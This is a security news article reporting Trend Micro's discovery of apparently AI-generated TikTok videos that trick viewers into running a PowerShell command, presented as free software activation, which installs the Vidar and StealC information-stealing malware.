TikTok users are being warned to look out for videos—likely deepfakes—showing them how to activate Windows and Microsoft Office, or to enable premium features in apps such as Spotify or CapCut.

The similarity of the videos suggests that they were likely created through automation, said Trend Micro, which uncovered the campaign, while the voice issuing instructions also appears to be AI-generated.

This makes the videos particularly dangerous, as it allows for extremely large-scale operations, as well as the ability to target different categories of users with different tactics.

The videos instruct users to pull up the Run program on Windows and then execute a PowerShell command that, they're told, will activate the software or extra features for free.

In reality, though, the command downloads a malicious script that distributes the Vidar and StealC information-stealing malware. Vidar can then take screenshots of the victim's desktop and steal credentials, credit cards, and cryptocurrency wallets, while StealC can also harvest a broad range of sensitive information.

"In this campaign, attackers are using TikTok videos to verbally instruct users into executing malicious commands on their own systems. The social engineering occurs within the video itself, rather than through detectable code or scripts", Trend Micro warned.

"There is no malicious code present on the platform for security solutions to analyze or block. All actionable content is delivered visually and aurally. Threat actors do this to attempt to evade existing detection mechanisms, making it harder for defenders to detect and disrupt these campaigns."

The researchers found a number of accounts posting the videos, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. One video reached more than half a million views, with over 20,000 likes and more than 100 comments.

"The vast user base and algorithmic reach of social media platforms provide an ideal delivery mechanism for threat actors", said Trend Micro threats analyst Junestherry Dela Cruz.

"For attackers, this means broad distribution without the logistical burden of maintaining an infrastructure. The use of AI-generated content also elevates these kinds of attacks from isolated incidents to a highly scalable operation, as these videos can be rapidly produced and tailored to target different user segments."

The popularity of TikTok means that scams are rife, with fake giveaways, fake celebrity and influencer accounts, romance scams and more. The company regularly takes down scam accounts and warns users, asking them to report any scams that they find. It has taken down the accounts reported by Trend Micro.

"Users should be encouraged to scrutinize unsolicited technical instructions, verify the legitimacy of video sources, and report suspicious content, whether on social media, messaging apps, or email", Trend Micro warned. "After all, if an offer seems too good to be true, it probably is."